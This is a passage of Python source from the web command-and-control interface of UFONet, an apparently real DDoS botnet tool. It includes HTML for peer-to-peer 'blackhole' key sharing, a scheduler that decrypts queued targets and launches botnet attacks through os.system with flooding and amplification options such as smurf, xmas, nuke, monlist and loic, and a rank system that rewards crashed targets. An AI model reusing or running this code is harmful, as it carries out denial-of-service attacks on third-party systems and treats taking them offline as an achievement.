  2084. window.alert("You need to enter a valid key (provided by someone)");
  2085. return
  2086. }else{
  2087. params="blackhole_key="+escape(blackhole_key)
  2088. runCommandX("cmd_decrypt",params)
  2089. document.getElementById("nb1").style.display = "none";
  2090. }
  2091. }
  2092. </script>
  2093. <script language="javascript">
  2094. function RefreshBlackhole(){
  2095. blackholes_source=document.getElementById("blackholes_source").value
  2096. if(blackholes_source == "") {
  2097. window.alert("You need to enter a valid IP (with a 'blackhole' listening on).");
  2098. return
  2099. }else{
  2100. params="blackholes_source="+escape(blackholes_source)
  2101. runCommandX("cmd_refresh_blackholes",params)
  2102. document.getElementById("nb1").style.display = "none";
  2103. setTimeout("location.reload()", 10000)
  2104. }
  2105. }
  2106. </script>
  2107. </head><body bgcolor="black" text="yellow" style="font-family: Courier, 'Courier New', monospace;" onload="start()" onresize="resize()" onorientationchange="resize()" onmousedown="context.fillStyle='rgba(0,0,0,'+opacity+')'" onmouseup="context.fillStyle='rgb(0,0,0)'">
  2108. <canvas id="starfield" style="z-index:-1; background-color:#000000; position:fixed; top:0; left:0;"></canvas>
  2109. <br>
  2110. <center><table cellpadding="2" cellspacing="2"><tr><td><table cellpadding="5" cellspacing="5"><tr>
  2111. <td>Blackhole/IP:</td>
  2112. <td><input type="text" name="blackholes_source" id="blackholes_source" size="20" value='"""+default_blackhole+"""'></td>
  2113. </tr></table></td><td><button title="Refreshing blackhole..." onClick="RefreshBlackhole()" style="color:yellow; height:40px; width:200px; font-weight:bold; background-color:red; border: 2px solid yellow;">Open Warp!</button></td></tr></table>
  2114. <hr>
  2115. <table cellpadding="5" cellspacing="5"><tr>
  2116. <td><a href="javascript:alert('Dhïkta says: """ + self.ranking + """... I can open warps directly to blackholes created by other motherships. This is nice to share and increase your legion on a crypto-distributed (P2P) way...');"><img src='data:image/png;base64,"""+self.alien3_img+"""'></a></td><td>
  2117. <table cellpading="5" cellspacing="10"><tr><td>
  2118. <form method='GET'>
  2119. Your key: <input type="text" name="blackhole_key" id="blackhole_key" size="20" value='"""+self.crypto_key+"""'>
  2120. </td></tr><tr><td>
  2121. <a style='color:red;text-decoration:underline red;' onclick=javascript:Decrypt();>Try decryption!</a>
  2122. </form>
  2123. </td></tr></table></td></tr></table>
  2124. <hr><br>
  2125. </center>
  2126. Last update: <font color='"""+ self.blackholes_status_color + """'>"""+ self.blackholes_datetime + """</font><br><br>
  2127. <div id="cmdOut"></div>
  2128. <div id="nb1" style="display: block;">"""+self.blackholes_text+"""</div>
  2129. """ + self.pages["/footer"]
  2130. def wargames_engage_routine(self, wargames_engage_list): # check jobs when gui refresh (global army supply)
  2131. sep = wargames_msg_sep
  2132. flag_ufosyn = None
  2133. flag_spray = None
  2134. flag_smurf = None
  2135. flag_xmas = None
  2136. flag_nuke = None
  2137. flag_tachyon = None
  2138. flag_monlist = None
  2139. flag_fraggle = None
  2140. flag_sniper = None
  2141. flag_ufoack = None
  2142. flag_uforst = None
  2143. flag_droper = None
  2144. flag_overlap = None
  2145. flag_pinger = None
  2146. flag_ufoudp = None
  2147. for job in wargames_engage_list:
  2148. job_t2 = job.rsplit(sep, 1)[0]
  2149. job_creation = job_t2.rsplit(sep, 1)[0]
  2150. job_target = job_t2.rsplit(sep, 1)[1]
  2151. job_estimated = job.rsplit(sep, 1)[1]
  2152. self.decrypt(self.crypto_key, job_estimated)
  2153. if self.decryptedtext:
  2154. job_estimated_dec = self.decryptedtext
  2155. else:
  2156. job_estimated_dec = ""
  2157. self.decryptedtext = ""
  2158. now = strftime("%d-%m-%Y %H:%M:%S", gmtime())
  2159. now = strptime(now, "%d-%m-%Y %H:%M:%S")
  2160. try:
  2161. job_estimated_dec = strptime(job_estimated_dec.decode('utf-8'), "%d-%m-%Y %H:%M:%S")
  2162. except:
  2163. job_estimated_dec = strptime(job_estimated_dec, "%d-%m-%Y %H:%M:%S")
  2164. if (job_estimated_dec == now or job_estimated_dec < now): # engage it! (when 'now' or '<')
  2165. self.decrypt(self.crypto_key, job_target)
  2166. if self.decryptedtext:
  2167. job_target_dec = self.decryptedtext
  2168. else:
  2169. job_target_dec = ""
  2170. self.decryptedtext = ""
  2171. if job_target_dec is not "":
  2172. job_target_dec = "http://" + job_target_dec # set target prefix to http://
  2173. try: # read global army supply (json)
  2174. with open(self.mothership_supplycfg_file) as data_file:
  2175. data = json.load(data_file)
  2176. except:
  2177. print('[Info] [AI] Cannot found: "core/json/supplycfg.json" -> [Generating!]')
  2178. with open(self.mothership_supplycfg_file, "w") as f:
  2179. json.dump({"botnet": 1, "loic": 0, "loris": 0, "ufosyn": 0, "spray": 0, "smurf": 0, "xmas": 0, "nuke": 0, "tachyon": 0, "monlist": 0, "fraggle": 0, "sniper": 0, "ufoack": 0, "uforst": 0, "droper": 0, "overlap": 0, "pinger": 0, "ufoudp": 0}, f, indent=4)
  2180. with open(self.mothership_supplycfg_file) as data_file:
  2181. data = json.load(data_file)
  2182. self.supply_botnet = data["botnet"]
  2183. self.supply_loic = data["loic"]
  2184. self.supply_loris = data["loris"]
  2185. self.supply_ufosyn = data["ufosyn"]
  2186. self.supply_spray = data["spray"]
  2187. self.supply_smurf = data["smurf"]
  2188. self.supply_xmas = data["xmas"]
  2189. self.supply_nuke = data["nuke"]
  2190. self.supply_tachyon = data["tachyon"]
  2191. self.supply_monlist = data["monlist"]
  2192. self.supply_fraggle = data["fraggle"]
  2193. self.supply_sniper = data["sniper"]
  2194. self.supply_ufoack = data["ufoack"]
  2195. self.supply_uforst = data["uforst"]
  2196. self.supply_droper = data["droper"]
  2197. self.supply_overlap = data["overlap"]
  2198. self.supply_pinger = data["pinger"]
  2199. self.supply_ufoudp = data["ufoudp"]
  2200. job_estimated_dec = strftime("%d-%m-%Y %H:%M:%S", job_estimated_dec)
  2201. print("[Info] [Wargames] Time is over: [" + str(job_estimated_dec) + "] -> Engaging target: " + str(job_target_dec))
  2202. cmd = ""
  2203. nonroot_cmd = python_version + " -i ufonet -a "+str(job_target_dec)+" -r "+str(self.supply_botnet)+" "
  2204. root_cmd = "sudo "+ python_version+" -i ufonet -a "+str(job_target_dec)+" -r "+str(self.supply_botnet)+" "
  2205. if int(self.supply_fraggle) > 0:
  2206. cmd += "--fraggle " +str(self.supply_fraggle)+ " "
  2207. flag_fraggle = True
  2208. if int(self.supply_sniper) > 0:
  2209. cmd += "--sniper " +str(self.supply_sniper)+ " "
  2210. flag_sniper = True
  2211. if int(self.supply_ufoack) > 0:
  2212. cmd += "--ufoack " +str(self.supply_ufoack)+ " "
  2213. flag_ufoack = True
  2214. if int(self.supply_uforst) > 0:
  2215. cmd += "--uforst " +str(self.supply_uforst)+ " "
  2216. flag_uforst = True
  2217. if int(self.supply_droper) > 0:
  2218. cmd += "--droper " +str(self.supply_droper)+ " "
  2219. flag_droper = True
  2220. if int(self.supply_overlap) > 0:
  2221. cmd += "--overlap " +str(self.supply_overlap)+ " "
  2222. flag_overlap = True
  2223. if int(self.supply_pinger) > 0:
  2224. cmd += "--pinger " +str(self.supply_pinger)+ " "
  2225. flag_pinger = True
  2226. if int(self.supply_ufoudp) > 0:
  2227. cmd += "--ufoudp " +str(self.supply_ufoudp)+ " "
  2228. flag_ufoudp = True
  2229. if int(self.supply_monlist) > 0:
  2230. cmd += "--monlist " +str(self.supply_monlist)+ " "
  2231. flag_monlist = True
  2232. if int(self.supply_tachyon) > 0:
  2233. cmd += "--tachyon " +str(self.supply_tachyon)+ " "
  2234. flag_tachyon = True
  2235. if int(self.supply_nuke) > 0:
  2236. cmd += "--nuke " +str(self.supply_nuke)+ " "
  2237. flag_nuke = True
  2238. if int(self.supply_xmas) > 0:
  2239. cmd += "--xmas " +str(self.supply_xmas)+ " "
  2240. flag_xmas = True
  2241. if int(self.supply_smurf) > 0:
  2242. cmd += "--smurf " +str(self.supply_smurf)+ " "
  2243. flag_smurf = True
  2244. if int(self.supply_spray) > 0:
  2245. cmd += "--spray " +str(self.supply_spray)+ " "
  2246. flag_spray = True
  2247. if int(self.supply_ufosyn) > 0:
  2248. cmd += "--ufosyn " +str(self.supply_ufosyn)+ " "
  2249. flag_ufosyn = True
  2250. if int(self.supply_loris) > 0:
  2251. cmd += "--loris " +str(self.supply_loris)+ " "
  2252. if int(self.supply_loic) > 0:
  2253. cmd += "--loic " +str(self.supply_loic)+ " "
  2254. if not flag_fraggle and not flag_sniper and not flag_ufoack and not flag_uforst and not flag_droper and not flag_overlap and not flag_pinger and not flag_ufoudp and not flag_monlist and not flag_tachyon and not flag_nuke and not flag_xmas and not flag_smurf and not flag_spray and not flag_ufosyn:
  2255. cmd = nonroot_cmd + cmd # non root required (LOIC, LORIS)
  2256. if flag_ufosyn == True or flag_spray == True or flag_smurf == True or flag_xmas == True or flag_nuke == True or flag_tachyon == True or flag_monlist == True or flag_fraggle == True or flag_sniper == True or flag_ufoack == True or flag_uforst == True or flag_droper == True or flag_overlap == True or flag_pinger == True or flag_ufoudp == True:
  2257. cmd = root_cmd + cmd # root required (UFOSYN, SPRAY, SMURF, XMAS, NUKE, TACHYON, MONLIST, FRAGGLE, SNIPER, UFOACK, UFORST, DROPER, OVERLAP, PINGER, UFOUDP)
  2258. runcmd = cmd + " "
  2259. runcmd = runcmd + "--force-yes &" # no raw_input allowed on webgui (+run it as daemon!)
  2260. print("[Info] [Wargames] Running command:", runcmd, "\n")
  2261. os.system(runcmd) # launch it!
  2262. if "!!!" in job: # remove it from queue (unjob)
  2263. f = open(self.wargames_file, "r")
  2264. ls = f.readlines()
  2265. f.close()
  2266. f = open(self.wargames_file, "w")
  2267. for l in ls:
  2268. if str(l) != str(job):
  2269. f.write(l)
  2270. else:
  2271. job = re.sub('[!!!]', '', job)
  2272. f.write(job)
  2273. f.close()
  2274. def extract_ranking_table(self):
  2275. f = open(self.grid_file,"r") # ranking data extracted from grid.txt
  2276. ls = f.readlines()
  2277. f.close()
  2278. if not ls: # not data on grid.txt
  2279. return
  2280. ranking_items={}
  2281. ranking_key = crypto_key
  2282. nodec_text = "Anonymous"
  2283. nodec_num = 0
  2284. self.ranking_grid_total = 0
  2285. try:
  2286. for j in ls:
  2287. if grid_msg_sep in j:
  2288. self.ranking_grid_total = self.ranking_grid_total + 1
  2289. m = j.split(grid_msg_sep)
  2290. ranking_nickname = m[0] # nickname
  2291. self.decrypt(ranking_key, ranking_nickname)
  2292. if self.decryptedtext:
  2293. ranking_nickname = str(self.decryptedtext)
  2294. else:
  2295. ranking_nickname = nodec_text
  2296. if ranking_nickname == "Anonymous":
  2297. ranking_nickname = ranking_nickname + str(self.ranking_grid_total*3) # add pseudo-rand as end to evade similars
  2298. self.decryptedtext = "" # clean decryptedtext buffer
  2299. ranking_ranking = m[1] # ranking
  2300. self.decrypt(ranking_key, ranking_ranking)
  2301. if self.decryptedtext:
  2302. try:
  2303. ranking_ranking = int(self.decryptedtext)
  2304. except:
  2305. ranking_ranking = nodec_num
  2306. else:
  2307. ranking_ranking = nodec_num
  2308. ranking_items[ranking_nickname] = ranking_ranking
  2309. except:
  2310. ranking_nickname = "Anonymous"
  2311. ranking_ranking = 0
  2312. ranking_items[ranking_nickname] = ranking_ranking
  2313. self.top_rookie = []
  2314. self.top_mercenary = []
  2315. self.top_bandit = []
  2316. self.top_ufommander = []
  2317. self.top_ufoleet = []
  2318. for k, v in ranking_items.items():
  2319. if v is 0: # not any data (or decryption allowed) on grid so discard
  2320. pass
  2321. if v is 1: # add this player as a rookie
  2322. self.ranking_grid_rookie = self.ranking_grid_rookie + 1
  2323. self.top_rookie.append(k)
  2324. elif v is 2: # add this player as a mercenary
  2325. self.ranking_grid_mercenary = self.ranking_grid_mercenary + 1
  2326. self.top_mercenary.append(k)
  2327. elif v is 3: # add this player as a bandit
  2328. self.ranking_grid_bandit = self.ranking_grid_bandit + 1
  2329. self.top_bandit.append(k)
  2330. elif v is 4: # add this player as a ufommander
  2331. self.ranking_grid_ufommander = self.ranking_grid_ufommander + 1
  2332. self.top_ufommander.append(k)
  2333. elif v is 5: # add this player as a ufoleet
  2334. self.ranking_grid_ufoleet = self.ranking_grid_ufoleet + 1
  2335. self.top_ufoleet.append(k)
  2336. else: # add this player as unknown
  2337. self.ranking_grid_unknown = self.ranking_grid_unknown + 1
  2338. top5 = sorted(ranking_items, key=ranking_items.get, reverse=True)[:5]
  2339. for p in top5: # extract best players
  2340. if self.ranking_top5_player1 == "Anonymous":
  2341. self.ranking_top5_player1 = p
  2342. elif self.ranking_top5_player2 == "Anonymous":
  2343. self.ranking_top5_player2 = p
  2344. elif self.ranking_top5_player3 == "Anonymous":
  2345. self.ranking_top5_player3 = p
  2346. elif self.ranking_top5_player4 == "Anonymous":
  2347. self.ranking_top5_player4 = p
  2348. elif self.ranking_top5_player5 == "Anonymous":
  2349. self.ranking_top5_player5 = p
  2350. if self.ranking == "Rookie":
  2351. shuffle(self.top_rookie) # shuffle for different results
  2352. top3 = self.top_rookie[:3]
  2353. elif self.ranking == "Mercenary":
  2354. shuffle(self.top_mercenary)
  2355. top3 = self.top_mercenary[:3]
  2356. elif self.ranking == "Bandit":
  2357. shuffle(self.top_bandit)
  2358. top3 = self.top_bandit[:3]
  2359. elif self.ranking == "UFOmmander!":
  2360. shuffle(self.top_ufommander)
  2361. top3 = self.top_ufommander[:3]
  2362. elif self.ranking == "UFOl33t!":
  2363. shuffle(self.top_ufoleet)
  2364. top3 = self.top_ufoleet[:3]
  2365. for p in top3: # extract similar player
  2366. if self.ranking_similar_player1 == "Anonymous":
  2367. self.ranking_similar_player1 = p
  2368. elif self.ranking_similar_player2 == "Anonymous":
  2369. self.ranking_similar_player2 = p
  2370. elif self.ranking_similar_player3 == "Anonymous":
  2371. self.ranking_similar_player3 = p
  2372. top1 = sorted(ranking_items, key=ranking_items.get, reverse=True)
  2373. shuffle(top1) # shuffle for different results
  2374. top1 = random.choice(top1).strip() # extract random player
  2375. self.ranking_top1_player1 = top1
  2376. def __init__(self):
  2377. self.crypto_key = crypto_key # set default symmetric crypto key
  2378. self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
  2379. self.board_file = 'data/board.txt' # set source path to retrieve board warning message
  2380. self.grid_file = 'data/grid.txt' # set source path to retrieve grid
  2381. self.board_warning = "" # set initial (str) board warning message
  2382. self.wargames_file = 'data/wargames.txt' # set source path to retrieve wargames
  2383. self.links_file = 'data/links.txt' # set source path to retrieve links
  2384. self.streams_file = 'data/streams.txt' # set source path to retrieve streams
  2385. self.games_file = 'data/games.txt' # set source path to retrieve games
  2386. self.globalnet_file = 'data/globalnet.txt' # set source path to retrieve Global.Net
  2387. self.zombies_file = "botnet/zombies.txt" # set source path to retrieve 'zombies'
  2388. self.aliens_file = "botnet/aliens.txt" # set source path to retrieve 'aliens'
  2389. self.droids_file = "botnet/droids.txt" # set source path to retrieve 'droids'
  2390. self.ucavs_file = "botnet/ucavs.txt" # set source path to retrieve 'ucavs'
  2391. self.rpcs_file = "botnet/rpcs.txt" # set source path to retrieve 'rpcs'
  2392. self.ntps_file = "botnet/ntp.txt" # set source path to retrieve 'ntps'
  2393. self.dnss_file = "botnet/dns.txt" # set source path to retrieve 'dns'
  2394. self.snmps_file = "botnet/snmp.txt" # set source path to retrieve 'snmps'
  2395. self.release_date_file = "docs/release.date" # set source path to retrieve release date
  2396. self.news = "data/news.txt" # set source path to retrieve server news
  2397. self.missions = "data/missions.txt" # set source path to retrieve server missions
  2398. self.mothership_webcfg_file = 'core/json/webcfg.json' # set source for mothership webcfg
  2399. self.mothership_stats_file = 'core/json/stats.json' # set source for mothership stats
  2400. self.mothership_boardcfg_file = 'core/json/boardcfg.json' # set source for mothership boardcfg
  2401. self.mothership_gridcfg_file = 'core/json/gridcfg.json' # set source for mothership gridcfg
  2402. self.mothership_supplycfg_file = 'core/json/supplycfg.json' # set source for mothership supplyscfg
  2403. self.ranking = "Rookie Star" # set starting rank
  2404. self.decryptedtext = "" # set buffer for decryption
  2405. self.encryptedtext = "" # set buffer for encryption
  2406. self.blackholes = "data/nodes.dat" # set source path to retrieve server blackholes (nodes.dat)
  2407. self.blackhole = default_blackhole # set default blackhole
  2408. self.blackholes_status = "Not connected!" # set default status for blackholes
  2409. self.blackholes_status_color = "red" # set default status color for blackholes
  2410. self.referer = 'http://127.0.0.1/'
  2411. self.mothershipname = "core/txt/shipname.txt"
  2412. self.ufonet_logo_img = open("core/images/ufonet-logo.txt").read()
  2413. self.favicon_img = open("core/images/favicon.txt").read()
  2414. self.mothership_img = open("core/images/mothership.txt").read()
  2415. self.commander_img = open("core/images/commander.txt").read()
  2416. self.board_img = open("core/images/board.txt").read()
  2417. self.aliens_img = open("core/images/aliens.txt").read()
  2418. self.alien1_img = open("core/images/aliens/alien1.txt").read()
  2419. self.alien2_img = open("core/images/aliens/alien2.txt").read()
  2420. self.alien3_img = open("core/images/aliens/alien3.txt").read()
  2421. self.alien4_img = open("core/images/aliens/alien4.txt").read()
  2422. self.alien5_img = open("core/images/aliens/alien5.txt").read()
  2423. self.alien6_img = open("core/images/aliens/alien6.txt").read()
  2424. self.alien7_img = open("core/images/aliens/alien7.txt").read()
  2425. self.alien8_img = open("core/images/aliens/alien8.txt").read()
  2426. self.alien9_img = open("core/images/aliens/alien9.txt").read()
  2427. self.alien10_img = open("core/images/aliens/alien10.txt").read()
  2428. self.alien11_img = open("core/images/aliens/alien11.txt").read()
  2429. self.alien12_img = open("core/images/aliens/alien12.txt").read()
  2430. self.alien13_img = open("core/images/aliens/alien13.txt").read()
  2431. self.ranking_grid_total = 0
  2432. self.ranking_grid_rookie = 0
  2433. self.ranking_grid_mercenary = 0
  2434. self.ranking_grid_bandit = 0
  2435. self.ranking_grid_ufommander = 0
  2436. self.ranking_grid_ufoleet = 0
  2437. self.ranking_grid_unknown = 0
  2438. self.ranking_top5_player1 = "Anonymous"
  2439. self.ranking_top5_player2 = "Anonymous"
  2440. self.ranking_top5_player3 = "Anonymous"
  2441. self.ranking_top5_player4 = "Anonymous"
  2442. self.ranking_top5_player5 = "Anonymous"
  2443. self.ranking_similar_player1 = "Anonymous"
  2444. self.ranking_similar_player2 = "Anonymous"
  2445. self.ranking_similar_player3 = "Anonymous"
  2446. self.ranking_top1_player1 = "Anonymous"
  2447. f = open(self.mothershipname) # extract ship name
  2448. self.mothership_id = f.read()
  2449. self.mothership_id = self.mothership_id[:25] # truncating anti-formats ;-)
  2450. f.close()
  2451. f = open(self.release_date_file) # extract release creation datetime
  2452. self.release_date = f.read()
  2453. # adding AnonTwi (anontwi.03c8.net) cyphering -> AES256+HMAC-SHA1
  2454. self.trans_5C = ''.join([chr (x ^ 0x5c) for x in range(256)])
  2455. self.trans_36 = ''.join([chr (x ^ 0x36) for x in range(256)])
  2456. self.trans_5C = self.trans_5C.encode("latin-1")
  2457. self.trans_36 = self.trans_36.encode("latin-1")
  2458. f.close()
  2459. f = open(self.blackholes) # double extract blackholes (nodes.dat)
  2460. self.blackholes_text = f.read()
  2461. f.close()
  2462. f = open(self.blackholes)
  2463. self.blackholes_block = f.readlines()
  2464. f.close()
  2465. self.list_blackholes = []
  2466. for b in self.blackholes_block:
  2467. self.list_blackholes.append(b)
  2468. self.blackholes_datetime = time.ctime(os.path.getctime('data/nodes.dat')) # extract nodes.dat datetime
  2469. if self.blackholes_datetime == self.release_date_file: # never connected to feeds
  2470. self.blackholes_status_color = "red" # set status color for blackholes to 'red'
  2471. else:
  2472. self.blackholes_status_color = "green" # set status color for blackholes to 'green'
  2473. f = open(self.news) # double extract news
  2474. self.news_text = f.read()
  2475. f.close()
  2476. f = open(self.news)
  2477. self.news_block = f.readlines()
  2478. f.close()
  2479. self.list_news = []
  2480. for n in self.news_block:
  2481. self.list_news.append(n)
  2482. self.news_datetime = time.ctime(os.path.getctime('data/news.txt')) # extract news.txt datetime
  2483. if self.news_datetime == self.release_date_file: # never connected to feeds
  2484. self.news_status_color = "red" # set status color for news to 'red'
  2485. else:
  2486. self.news_status_color = "green" # set status color for news to 'green'
  2487. f = open(self.board_file) # double extract board
  2488. self.moderator_text = f.read()
  2489. f.close()
  2490. f = open(self.board_file)
  2491. self.moderator_block = f.readlines()
  2492. f.close()
  2493. self.list_moderator = []
  2494. for n in self.moderator_block:
  2495. self.list_moderator.append(n)
  2496. f = open(self.grid_file) # double grid board
  2497. self.grid_text = f.read()
  2498. self.ranking_text = f.read() # ranking data is extracted from grid
  2499. f.close()
  2500. f = open(self.grid_file)
  2501. self.grid_block = f.readlines()
  2502. f.close()
  2503. self.list_grid = []
  2504. for n in self.grid_block:
  2505. self.list_grid.append(n)
  2506. self.ranking_datetime = time.ctime(os.path.getctime('data/grid.txt')) # extract grid.txt datetime for ranking calcs
  2507. if self.ranking_datetime == self.release_date_file: # never connected to feeds
  2508. self.ranking_status_color = "red" # set status color for ranking to 'red'
  2509. else:
  2510. self.ranking_status_color = "green" # set status color for ranking to 'green'
  2511. f = open(self.wargames_file) # double wargames board
  2512. self.wargames_text = f.read()
  2513. f.close()
  2514. f = open(self.wargames_file)
  2515. self.wargames_block = f.readlines()
  2516. f.close()
  2517. self.list_wargames = []
  2518. for n in self.wargames_block:
  2519. self.list_wargames.append(n)
  2520. f = open(self.links_file) # double links extraction
  2521. self.links_text = f.read()
  2522. f.close()
  2523. f = open(self.links_file)
  2524. self.links_block = f.readlines()
  2525. f.close()
  2526. self.list_links = []
  2527. for n in self.links_block:
  2528. self.list_links.append(n)
  2529. f = open(self.globalnet_file) # double globalnet extraction
  2530. self.globalnet_text = f.read()
  2531. f.close()
  2532. f = open(self.globalnet_file)
  2533. self.globalnet_block = f.readlines()
  2534. f.close()
  2535. self.list_globalnet = []
  2536. for n in self.globalnet_block:
  2537. self.list_globalnet.append(n)
  2538. f = open(self.streams_file) # double streams extraction
  2539. self.streams_text = f.read()
  2540. f.close()
  2541. f = open(self.streams_file)
  2542. self.streams_block = f.readlines()
  2543. f.close()
  2544. self.list_streams = []
  2545. for n in self.streams_block:
  2546. self.list_streams.append(n)
  2547. f = open(self.missions) # double extract missions
  2548. self.missions_text = f.read()
  2549. f.close()
  2550. f = open(self.missions)
  2551. self.missions_block = f.readlines()
  2552. f.close()
  2553. self.list_missions = []
  2554. for m in self.missions_block:
  2555. self.list_missions.append(m)
  2556. self.missions_datetime = time.ctime(os.path.getctime('data/missions.txt')) # extract missions.txt datetime
  2557. if self.missions_datetime == self.release_date_file: # never connected to feeds
  2558. self.missions_status_color = "red" # set status color for missions to 'red'
  2559. else:
  2560. self.missions_status_color = "green" # set status color for missions to 'green'
  2561. stats_json_file = open(self.mothership_stats_file, "r") # extract mothership stats
  2562. data = json.load(stats_json_file)
  2563. stats_json_file.close()
  2564. self.abductor = Abductor(self) # call abductor for data size conversor
  2565. self.aflying = data["flying"]
  2566. self.ascanner = data["scanner"]
  2567. self.atransferred = data["transferred"]
  2568. self.amax_chargo = data["max_chargo"]
  2569. self.amissions = data["missions"]
  2570. self.acompleted = data["completed"]
  2571. self.aloic = data["loic"]
  2572. self.aloris = data["loris"]
  2573. self.aufosyn = data["ufosyn"]
  2574. self.aspray = data["spray"]
  2575. self.asmurf = data["smurf"]
  2576. self.axmas = data["xmas"]
  2577. self.anuke = data["nuke"]
  2578. self.atachyon = data["tachyon"]
  2579. self.amonlist = data["monlist"]
  2580. self.afraggle = data["fraggle"]
  2581. self.asniper = data["sniper"]
  2582. self.aufoack = data["ufoack"]
  2583. self.auforst = data["uforst"]
  2584. self.adroper = data["droper"]
  2585. self.aoverlap = data["overlap"]
  2586. self.apinger = data["pinger"]
  2587. self.aufoudp = data["ufoudp"]
  2588. self.tcrashed = data["crashed"]
  2589. if int(self.acompleted) > 0: # check for attacks completed
  2590. self.mothership_acc = Decimal((int(self.tcrashed) * 100) / int(self.acompleted)) # decimal rate: crashed*100/completed
  2591. else:
  2592. self.mothership_acc = 100 # WarGames: "the only way to win in Nuclear War is not to play"
  2593. if int(self.acompleted) < 5: # generating motherships commander ranks by rpg/experiences
  2594. self.ranking = "Rookie"
  2595. elif int(self.acompleted) > 4 and int(self.tcrashed) < 1: # add first ranking step on 5 complete attacks
  2596. self.ranking = "Mercenary"
  2597. elif int(self.tcrashed) > 0 and int(self.tcrashed) < 2: # second ranking step with almost 1 crashed
  2598. self.ranking = "Bandit"
  2599. elif int (self.acompleted) < 50 and int(self.tcrashed) > 4: # third ranking value is only for real "crashers" ;-)
  2600. self.ranking = "UFOmmander!"
  2601. elif int(self.acompleted) > 49 and int(self.tcrashed) > 4: # this people is trying to build a Global Federated Network >-)
  2602. self.ranking = "UFOl33t!"
  2603. f = open(self.zombies_file)
  2604. self.zombies = f.readlines()
  2605. self.zombies = [zombie.replace('\n', '') for zombie in self.zombies]
  2606. self.list_zombies = []
  2607. for zombie in self.zombies:
  2608. t = urlparse(zombie)
  2609. name_zombie = t.netloc
  2610. if "www." in name_zombie:
  2611. name_zombie = name_zombie.replace("www.","")
  2612. self.list_zombies.append(name_zombie)
  2613. self.num_zombies = str(len(self.zombies))
  2614. f.close()
  2615. f = open(self.aliens_file)
  2616. self.aliens = f.readlines()
  2617. self.aliens = [alien.replace('\n', '') for alien in self.aliens]
  2618. self.list_aliens = []
  2619. for alien in self.aliens:
  2620. t = urlparse(alien)
  2621. name_alien = t.netloc
  2622. if "www." in name_alien:
  2623. name_alien = name_alien.replace("www.","")
  2624. self.list_aliens.append(name_alien)
  2625. self.num_aliens = str(len(self.aliens))
  2626. f.close()
  2627. f = open(self.droids_file)
  2628. self.droids = f.readlines()
  2629. self.droids = [droid.replace('\n', '') for droid in self.droids]
  2630. self.list_droids = []
  2631. for droid in self.droids:
  2632. t = urlparse(droid)
  2633. name_droid = t.netloc
  2634. if "www." in name_droid:
  2635. name_droid = name_droid.replace("www.","")
  2636. self.list_droids.append(name_droid)
  2637. self.num_droids = str(len(self.droids))
  2638. f.close()
  2639. f = open(self.ucavs_file)
  2640. self.ucavs = f.readlines()
  2641. self.ucavs = [ucav.replace('\n', '') for ucav in self.ucavs]
  2642. self.list_ucavs = []
  2643. for ucav in self.ucavs:
  2644. t = urlparse(ucav)
  2645. name_ucav = t.netloc
  2646. if "www." in name_ucav:
  2647. name_ucav = name_ucav.replace("www.","")
  2648. self.list_ucavs.append(name_ucav)
  2649. self.num_ucavs = str(len(self.ucavs))
  2650. f.close()
  2651. f = open(self.rpcs_file)
  2652. self.rpcs = f.readlines()
  2653. self.rpcs = [rpc.replace('\n', '') for rpc in self.rpcs]
  2654. self.list_rpcs = []
  2655. for rpc in self.rpcs:
  2656. t = urlparse(rpc)
  2657. name_rpc = t.netloc
  2658. if "www." in name_rpc:
  2659. name_rpc = name_rpc.replace("www.","")
  2660. self.list_rpcs.append(name_rpc)
  2661. self.num_rpcs = str(len(self.rpcs))
  2662. f.close()
  2663. f = open(self.ntps_file)
  2664. self.ntps = f.readlines()
  2665. self.ntps = [ntp.replace('\n', '') for ntp in self.ntps]
  2666. self.list_ntps = []
  2667. for ntp in self.ntps:
  2668. t = urlparse(ntp)
  2669. name_ntp = t.netloc
  2670. if "www." in name_ntp:
  2671. name_ntp = name_ntp.replace("www.","")
  2672. self.list_ntps.append(name_ntp)
  2673. self.num_ntps = str(len(self.ntps))
  2674. f.close()
  2675. f = open(self.dnss_file)
  2676. self.dnss = f.readlines()
  2677. self.dnss = [dns.replace('\n', '') for dns in self.dnss]
  2678. self.list_dnss = []
  2679. for dns in self.dnss:
  2680. t = urlparse(dns)
  2681. name_dns = t.netloc
  2682. if "www." in name_dns:
  2683. name_dns = name_dns.replace("www.","")
  2684. self.list_dnss.append(name_dns)
  2685. self.num_dnss = str(len(self.dnss))
  2686. f.close()
  2687. f = open(self.snmps_file)
  2688. self.snmps = f.readlines()
  2689. self.snmps = [snmp.replace('\n', '') for snmp in self.snmps]
  2690. self.list_snmps = []
  2691. for snmp in self.snmps:
  2692. t = urlparse(snmp)
  2693. name_snmp = t.netloc
  2694. if "www." in name_snmp:
  2695. name_snmp = name_snmp.replace("www.","")
  2696. self.list_snmps.append(name_snmp)
  2697. self.num_snmps = str(len(self.snmps))
  2698. f.close()
  2699. self.total_botnet = str(int(self.num_zombies) + int(self.num_aliens) + int(self.num_droids) + int(self.num_ucavs) + int(self.num_rpcs) + int(self.num_ntps) + int(self.num_dnss) + int(self.num_snmps))
  2700. f = open(self.wargames_file, "r")
  2701. ls = f.readlines()
  2702. f.close()
  2703. self.supply_wargames = 0
  2704. self.wargames_engage_list = []
  2705. for l in ls:
  2706. if "!!!" in l:
  2707. self.wargames_engage_list.append(l)
  2708. self.supply_wargames = self.supply_wargames + 1
  2709. if self.supply_wargames > 0:
  2710. if self.supply_wargames == 1:
  2711. c_supply = "wargame"
  2712. else:
  2713. c_supply = "wargames"
  2714. self.current_tasks = '<br>-----------------------------------\n\n+ Jobs: <a href="/wargames">' + str(self.supply_wargames) + '</a> '+c_supply+''
  2715. self.wargames_engage_routine(self.wargames_engage_list) # threaded jobs engage routine
  2716. else:
  2717. self.current_tasks = ""
  2718. self.options = UFONetOptions()
  2719. self.pages = {}
  2720. self.pages["/header"] = """<!DOCTYPE html><html>
  2721. <head>
  2722. <link rel="icon" type="image/png" href="/images/favicon.ico" />
  2723. <meta name="author" content="psy">
  2724. <meta name="robots" content="noindex, nofollow">
  2725. <meta http-equiv="content-type" content="text/xml; charset=utf-8" />
  2726. <title>UFONet - [ C&C/DarkNet ]</title>
  2727. <script language="javascript" src="/lib.js"></script>
  2728. <script language="javascript" src="js/stars.js"></script>
  2729. <style>
